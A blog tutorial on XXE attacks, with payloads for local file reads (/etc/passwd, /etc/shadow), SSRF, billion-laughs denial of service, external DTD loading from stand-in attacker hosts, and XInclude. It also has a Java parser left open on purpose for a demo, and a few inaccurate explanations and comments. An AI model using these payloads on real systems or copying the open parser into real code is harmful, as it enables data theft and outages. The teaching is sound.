In this blog we would discuss about XML External Entity (XXE) vulnerability and i would demo the full exploitation process on vulnerable site I created called PinewoodStore.

XML External Entity (XXE) Vulnerability

Introduction

XML External Entity (XXE) vulnerabilities occur when an application processes XML input without properly restricting external entity references. This can lead to various security risks, including sensitive data disclosure, server-side request forgery (SSRF), and even remote code execution (RCE) in some cases.

How XXE Works

An XML document can define entities, which are placeholders for other pieces of data. If external entities are enabled, they can be used to access local files, interact with external resources, or cause denial-of-service attacks.

Example of a Vulnerable XML Parsing Code

<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY entity1 SYSTEM "file:///etc/passwd">]>
<user>&entity1;</user>

If an XML parser processes this input with external entity resolution enabled, it will replace &entity1; with the contents of /etc/passwd, potentially exposing sensitive system files.

---

Types of XXE Attacks

1. File Disclosure Attack

Attackers can use external entities to read local files and retrieve sensitive information such as system credentials, configuration files, and source code.

Example:

<!DOCTYPE user [
<!ENTITY entity1 SYSTEM "file:///etc/shadow">]>
<user>&entity1;</user>

If processed, the response will include the contents of /etc/shadow, exposing hashed passwords.

2. Server-Side Request Forgery (SSRF)

XXE can be used to force the server to make HTTP requests to internal or external resources.

Example:

<!DOCTYPE user [
<!ENTITY entity1 SYSTEM "http://internal.example.com/admin">]>
<user>&entity1;</user>

This attack may allow access to internal services that are otherwise inaccessible from the external network.

3. Denial of Service (Billion Laughs Attack)

An attacker can use nested entities to overload the XML parser, consuming memory and causing a denial-of-service.

Example:

<!DOCTYPE user [
<!ENTITY a "aaaaa">
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
]>
<user>&c;</user>

This recursive expansion can cause excessive CPU and memory usage, leading to server crashes.

4. Remote File Inclusion (RFI)

Attackers can reference external files, potentially executing remote scripts or accessing unauthorized resources.

Example:

<!DOCTYPE user [
<!ENTITY entity1 SYSTEM "http://malicious-site.com/malicious.dtd">]>
<user>&entity1;</user>

If processed, the server will fetch and process the malicious DTD file, potentially leading to further exploitation.

---

XML Entity Types and Declarations

1. Internal Entities

Defined within the DTD, these entities are replaced directly in the XML document.

<!DOCTYPE user [
<!ENTITY example "Hello, World!">]>
<user>&example;</user>

2. External Entities

Reference external resources such as files or URLs.

<!DOCTYPE user [
<!ENTITY entity1 SYSTEM "file:///etc/passwd">]>
<user>&entity1;</user>

These entities are dangerous if external entity resolution is enabled in the XML parser.

3. Parameter Entities

Used within DTDs, parameter entities can manipulate XML structures dynamically.

<!ENTITY % example "Hello, Parameter Entity!">
<!ENTITY exampleRef "%example;">

Parameter entities can also be used in external DTDs to load malicious content.

In XML, parameter entities are a special type of entity that can only be used within Document Type Definitions (DTDs). These are different from general entities, which are referenced directly in the XML document.

To distinguish them, parameter entities are declared using % instead of &.

---

1. General vs. Parameter Entities

• General entities: Declared and used in both the XML document and the DTD.
• Parameter entities: Declared and used only within the DTD.

General Entity Example (No %)

<!DOCTYPE user [
  <!ENTITY entity1 "Hello, World!">
]>
<user>&entity1;</user>

• Here, entity1 is a general entity, and it is referenced in the XML document using &entity1;.

---

Parameter Entity Example (Uses %)

<!DOCTYPE user [
  <!ENTITY % entity1 "Hello, Parameter Entity!">
  %entity1;
]>
<user>Example</user>

• The %entity1; is used inside the DTD only, not in the XML document.
• If you try to use %entity1; inside <user>, it will cause an error.

---

2. Why % is Used for Parameter Entities?

A. To Differentiate Scope

• % limits the use of parameter entities to within the DTD.
• & is for general entities, which can be used inside both XML and DTD.

B. To Allow Complex DTD Manipulation

• Parameter entities can be used to dynamically include other DTD files.
• Example of an XXE attack using parameter entities:

  <!DOCTYPE user [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY entity1 SYSTEM 'file:///etc/passwd'>">
    %eval;
  ]>
  <user>&entity1;</user>

• %file; loads the /etc/passwd file.
• %eval; dynamically injects a new external entity declaration.
• &entity1; gets evaluated and leaks the file content.

This is why parameter entities are especially dangerous in XXE attacks!

---

3. How Parameter Entities Are Used in External DTDs

Parameter entities can be used to reference external DTDs dynamically.

<!DOCTYPE user [
  <!ENTITY % remoteDTD SYSTEM "http://attacker.com/malicious.dtd">
  %remoteDTD;
]>
<user>Test</user>

• The remote DTD file is loaded from http://attacker.com/malicious.dtd.
• It can then define new entities to perform file disclosure, SSRF, or RCE.

---

4. How to Prevent XXE via Parameter Entities?

To prevent XXE attacks that abuse parameter entities, disable external DTD loading:

factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

These settings prevent the parser from processing % parameter entities that reference external files.

---

---

XInclude Injection

XInclude allows XML documents to include other XML documents or files, which can be abused to read sensitive files.

Example:

<user xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include href="file:///etc/passwd" parse="text"/>
</user>

If processed, the contents of /etc/passwd will be included in the response, similar to an XXE attack.

---

Vulnerable Java Code used in PinewoodStore to Demo the XXE Attack

@RestController
@RequestMapping("/send")
@CrossOrigin(origins = {"http://localhost:3000", "http://192.168.1.80:3000"}) // Adjust based on your frontend URL
public class VulnerableXMLController {

    @PostMapping("/email")
    public String parseXML(@RequestBody String xmlData) {
        try {
            // Step 1: Initialize the DocumentBuilderFactory
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            
            // Step 2: Disable DOCTYPE declarations (prevents XXE via DOCTYPE)
            //factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

            // Step 3: Disable external general entities
            // factory.setFeature("http://xml.org/sax/features/external-general-entities", false);

            // Step 4: Disable external parameter entities
            // factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

            // Step 5: Prevent XXE attacks via DTD processing
            // factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

            factory.setNamespaceAware(false);
            factory.setXIncludeAware(false); // Enables XInclude
            
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document document = builder.parse(new InputSource(new StringReader(xmlData)));

            // Extract data using XPath
            XPath xPath = XPathFactory.newInstance().newXPath();
            XPathExpression expression = xPath.compile("/user/email");

            String result = (String) expression.evaluate(document, XPathConstants.STRING);

            // Log result (useful for debugging)
            System.out.println("Extracted Data: " + result);

            return result.isEmpty() ? "No data found" : "Parsed Data: " + result;
        } catch (Exception e) {
            return "Error parsing XML: " + e.getMessage();
        }
    }
}

I have enabled the Document Type Declaration and XInclude on DocumentBuilderFactory to Demo the XXE attack and also turned the feature on to disable Document type Declaration and XInclude to observer how the code is secured. I have shared the Demo video on my YouTube channel which has been linked below.

---

Mitigation Techniques

To prevent XXE vulnerabilities, consider the following measures:

1. Disable External Entity Processing: Configure XML parsers to disallow external entities.
2. Use Safe Libraries: Use XML libraries that have secure defaults (e.g., javax.xml.parsers.DocumentBuilderFactory with external entity processing disabled).
3. Implement Input Validation: Restrict user input to prevent malicious payloads.
4. Use Whitelisting: Allow only trusted XML structures and entities.
5. Monitor and Log Requests: Detect unusual activity and block potential attacks.

---

Conclusion

XXE vulnerabilities pose a serious threat to applications processing XML data. By understanding the different types of attacks and implementing secure XML parsing practices, developers can mitigate the risks associated with XXE and protect sensitive data from exposure.

Share this post: on Twitter on Facebook